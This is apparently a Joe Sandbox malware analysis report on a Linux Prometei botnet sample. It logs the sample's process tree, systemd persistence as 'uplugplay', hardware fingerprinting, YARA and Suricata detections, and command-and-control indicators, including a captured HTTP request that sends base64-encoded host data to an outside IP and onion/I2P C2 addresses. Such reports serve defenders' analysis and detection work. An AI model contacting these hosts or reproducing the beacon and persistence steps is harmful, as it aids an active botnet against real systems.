Create Interactive Tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:	na.elf
Analysis ID:	1653283
MD5:	a602ed9fc13cf561bf74b56f8c1aa2ed
SHA1:	5c1e779505480e4b67f45e89db0f7def9e88e204
SHA256:	af20285f057974530228e55d6b18ea542b132d9a861805a8f174e9ebb808c831
Tags:	elfuser-abuse_ch
Infos:

Detection

Prometei

Score:	100
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Prometei

Drops files in suspicious directories

Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)

Found Tor onion address

Sample deletes itself

Sample is packed with UPX

Creates hidden files and/or directories

ELF contains segments with high entropy indicating compressed/encrypted content

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "pgrep" command search for and/or send signals to processes

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Executes the "uname" command used to read OS and architecture name

HTTP GET or POST without a user agent

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Reads system information from the proc file system

Sample contains only a LOAD segment without any section mappings

Sample listens on a socket

Sample tries to set the executable flag

Suricata IDS alerts with low severity for network traffic

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1653283
Start date and time:	2025-04-01 01:47:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	na.elf
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/13@2/0

Warnings

VT rate limit hit for: http://152.36.128.18/cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F

Runtime Messages

Command:	/tmp/na.elf
PID:	6233
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Starting... System install...OK
Standard Error:	Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6211, Parent: 4331)

rm (PID: 6211, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw

dash New Fork (PID: 6212, Parent: 4331)

cat (PID: 6212, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.ROSySM6ZUJ

dash New Fork (PID: 6213, Parent: 4331)

head (PID: 6213, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 6214, Parent: 4331)

tr (PID: 6214, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 6215, Parent: 4331)

cut (PID: 6215, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 6216, Parent: 4331)

cat (PID: 6216, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.ROSySM6ZUJ

dash New Fork (PID: 6217, Parent: 4331)

head (PID: 6217, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 6218, Parent: 4331)

tr (PID: 6218, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 6219, Parent: 4331)

cut (PID: 6219, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 6220, Parent: 4331)

rm (PID: 6220, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw

na.elf (PID: 6233, Parent: 6135, MD5: a602ed9fc13cf561bf74b56f8c1aa2ed) Arguments: /tmp/na.elf

na.elf New Fork (PID: 6236, Parent: 6233)

sh (PID: 6236, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"

sh New Fork (PID: 6237, Parent: 6236)

pgrep (PID: 6237, Parent: 6236, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf

na.elf New Fork (PID: 6240, Parent: 6233)

sh (PID: 6240, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof na.elf"

sh New Fork (PID: 6241, Parent: 6240)

pidof (PID: 6241, Parent: 6240, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof na.elf

na.elf New Fork (PID: 6244, Parent: 6233)

sh (PID: 6244, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"

sh New Fork (PID: 6245, Parent: 6244)

pgrep (PID: 6245, Parent: 6244, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay

na.elf New Fork (PID: 6250, Parent: 6233)

sh (PID: 6250, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"

sh New Fork (PID: 6251, Parent: 6250)

pgrep (PID: 6251, Parent: 6250, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup

na.elf New Fork (PID: 6254, Parent: 6233)

sh (PID: 6254, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"

sh New Fork (PID: 6255, Parent: 6254)

pidof (PID: 6255, Parent: 6254, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup

na.elf New Fork (PID: 6256, Parent: 6233)

sh (PID: 6256, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"

sh New Fork (PID: 6257, Parent: 6256)

systemctl (PID: 6257, Parent: 6256, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

na.elf New Fork (PID: 6271, Parent: 6233)

sh (PID: 6271, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"

sh New Fork (PID: 6272, Parent: 6271)

systemctl (PID: 6272, Parent: 6271, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service

na.elf New Fork (PID: 6278, Parent: 6233)

sh (PID: 6278, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"

sh New Fork (PID: 6279, Parent: 6278)

systemctl (PID: 6279, Parent: 6278, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service

systemd New Fork (PID: 6259, Parent: 6258)

snapd-env-generator (PID: 6259, Parent: 6258, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6276, Parent: 6275)

snapd-env-generator (PID: 6276, Parent: 6275, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6280, Parent: 1)

uplugplay (PID: 6280, Parent: 1, MD5: a602ed9fc13cf561bf74b56f8c1aa2ed) Arguments: /usr/sbin/uplugplay

uplugplay New Fork (PID: 6282, Parent: 6280)

uplugplay New Fork (PID: 6283, Parent: 6282)

sh (PID: 6283, Parent: 6282, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"

sh New Fork (PID: 6284, Parent: 6283)

uplugplay (PID: 6284, Parent: 6283, MD5: a602ed9fc13cf561bf74b56f8c1aa2ed) Arguments: /usr/sbin/uplugplay -Dcomsvc

uplugplay New Fork (PID: 6288, Parent: 6284)

sh (PID: 6288, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl

sh New Fork (PID: 6289, Parent: 6288)

hostnamectl (PID: 6289, Parent: 6288, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl

uplugplay New Fork (PID: 6294, Parent: 6284)

sh (PID: 6294, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl

sh New Fork (PID: 6295, Parent: 6294)

hostnamectl (PID: 6295, Parent: 6294, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl

uplugplay New Fork (PID: 6437, Parent: 6284)

sh (PID: 6437, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"

sh New Fork (PID: 6441, Parent: 6437)

dmidecode (PID: 6441, Parent: 6437, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard

uplugplay New Fork (PID: 6440, Parent: 6284)

sh (PID: 6440, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime

sh New Fork (PID: 6444, Parent: 6440)

uptime (PID: 6444, Parent: 6440, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime

uplugplay New Fork (PID: 6447, Parent: 6284)

sh (PID: 6447, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"

sh New Fork (PID: 6448, Parent: 6447)

uname (PID: 6448, Parent: 6447, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a

uplugplay New Fork (PID: 6453, Parent: 6284)

sh (PID: 6453, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"

sh New Fork (PID: 6454, Parent: 6453)

dmidecode (PID: 6454, Parent: 6453, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard

uplugplay New Fork (PID: 6457, Parent: 6284)

sh (PID: 6457, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"

sh New Fork (PID: 6458, Parent: 6457)

dmidecode (PID: 6458, Parent: 6457, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard

uplugplay New Fork (PID: 6461, Parent: 6284)

sh (PID: 6461, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode

sh New Fork (PID: 6462, Parent: 6461)

dmidecode (PID: 6462, Parent: 6461, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode

uplugplay New Fork (PID: 6471, Parent: 6284)

sh (PID: 6471, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime

sh New Fork (PID: 6472, Parent: 6471)

uptime (PID: 6472, Parent: 6471, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime

uplugplay New Fork (PID: 6475, Parent: 6284)

sh (PID: 6475, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"

sh New Fork (PID: 6476, Parent: 6475)

uname (PID: 6476, Parent: 6475, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a

fwupd New Fork (PID: 6291, Parent: 1)

gpg (PID: 6291, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version

fwupd New Fork (PID: 6297, Parent: 1)

gpg (PID: 6297, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27

systemd New Fork (PID: 6298, Parent: 1)

systemd-hostnamed (PID: 6298, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed

fwupd New Fork (PID: 6434, Parent: 1)

gpg (PID: 6434, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27

fwupd New Fork (PID: 6443, Parent: 1)

gpg (PID: 6443, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28

fwupd New Fork (PID: 6464, Parent: 1)

gpg (PID: 6464, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Prometei		No Attribution	https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html https://cujo.com/iot-malware-journals-prometei-linux/ https://twitter.com/IntezerLabs/status/1338480158249013250 https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
na.elf	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Dropped Files

Source	Rule	Description	Author	Strings
/usr/sbin/uplugplay	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45

Memory Dumps

Source	Rule	Description	Author	Strings
6233.1.0000000000401000.00000000004f9000.r-x.sdmp	Linux_Hacktool_Flooder_1a4eb229	unknown	unknown	0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
6233.1.0000000000401000.00000000004f9000.r-x.sdmp	Linux_Hacktool_Flooder_f454ec10	unknown	unknown	0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
6233.1.000000000052d000.0000000001575000.rw-.sdmp	Linux_Trojan_Dofloo_ac3333d1	unknown	unknown	0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 6233	JoeSecurity_Prometei	Yara detected Prometei	Joe Security
Process Memory Space: na.elf PID: 6233	JoeSecurity_Prometei_1	Yara detected Prometei	Joe Security

Suricata Signatures

ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-01T01:50:09.133975+0200	2044560	1	A Network Trojan was detected	192.168.2.23	39619	8.8.8.8	53	UDP
2025-04-01T01:50:09.248434+0200	2044560	1	A Network Trojan was detected	192.168.2.23	42875	8.8.8.8	53	UDP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-01T01:48:04.189583+0200	2803305	3	Unknown Traffic	192.168.2.23	58304	152.36.128.18	80	TCP
2025-04-01T01:48:07.772289+0200	2803305	3	Unknown Traffic	192.168.2.23	58306	152.36.128.18	80	TCP

Joe Sandbox Signatures

• AV Detection
• Bitcoin Miner
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: na.elf

Avira: detected

Antivirus detection for dropped file

Source: /usr/sbin/uplugplay

Avira: detection malicious, Label: LINUX/GM.Agent.JQ

Multi AV Scanner detection for submitted file

Source: na.elf	Virustotal: Detection: 36%			Perma Link
Source: na.elf	ReversingLabs: Detection: 47%

Bitcoin Miner

Yara detected Prometei

Source: Yara match

File source: Process Memory Space: na.elf PID: 6233, type: MEMORYSTR

Source: /usr/sbin/uplugplay (PID: 6284)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /usr/bin/pgrep (PID: 6237)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6245)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6284)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 6444)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 6472)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.23:42875 -> 8.8.8.8:53
Source: Network traffic	Suricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.23:39619 -> 8.8.8.8:53

Found Tor onion address

Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug

Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KICYgYnVsbHNleWUvc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAxODo0ODowNiB1cCA3IG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMS43NiwgMC44MSwgMC4zM3wxNzQzNDY0ODg2DQpMaW51eCBnYWxhc3NpYSA1LjQuMC03Mi1nZW5lcmljICM4MC1VYnVudHUgU01QIE1vbiBBcHIgMTIgMTc6MzU6MDAgVVRDIDIwMjEgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=TO32433452U81Q0F&h=galassia&enckey=eJjhO0mh02w9T30pl/WXlIUntj41tWS9rSR7xP768bszOdwRRk8sm99Gwb8p4fAUtFsaMrQdz8fJpgNa4ETYXWcBgFPqiTXmoGl+8qZO0fdsuRLffgksPZ8XKYaDpUN8YDBKiLMc17PTEoRT4C+3/J5LJGDBxK7Vu4yhIF//eDI= HTTP/1.0Host: 152.36.128.18

Source: /usr/sbin/uplugplay (PID: 6284)

Socket: 0.0.0.0:89

Jump to behavior

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58306 -> 152.36.128.18:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58304 -> 152.36.128.18:80

Source: unknown

DNS traffic detected: query: xinchaodbcfda.com replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.90.49

Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F HTTP/1.0Host: 152.36.128.18
Source: global traffic	HTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KICYgYnVsbHNleWUvc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAxODo0ODowNiB1cCA3IG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMS43NiwgMC44MSwgMC4zM3wxNzQzNDY0ODg2DQpMaW51eCBnYWxhc3NpYSA1LjQuMC03Mi1nZW5lcmljICM4MC1VYnVudHUgU01QIE1vbiBBcHIgMTIgMTc6MzU6MDAgVVRDIDIwMjEgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=TO32433452U81Q0F&h=galassia&enckey=eJjhO0mh02w9T30pl/WXlIUntj41tWS9rSR7xP768bszOdwRRk8sm99Gwb8p4fAUtFsaMrQdz8fJpgNa4ETYXWcBgFPqiTXmoGl+8qZO0fdsuRLffgksPZ8XKYaDpUN8YDBKiLMc17PTEoRT4C+3/J5LJGDBxK7Vu4yhIF//eDI= HTTP/1.0Host: 152.36.128.18

Source: global traffic	DNS traffic detected: DNS query: xinchaodbcfda.com
Source: global traffic	DNS traffic detected: DNS query: xinchaodbcfda.net

Source: na.elf, uplugplay.32.dr	String found in binary or memory: http://152.36.128
Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: na.elf, uplugplay.32.dr	String found in binary or memory: http://upx.sf.net
Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55240
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: 6233.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
Source: 6233.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
Source: 6233.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: /usr/sbin/uplugplay, type: DROPPED	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown

Source: LOAD without section mappings

Program segment: 0x400000

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: 6233.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
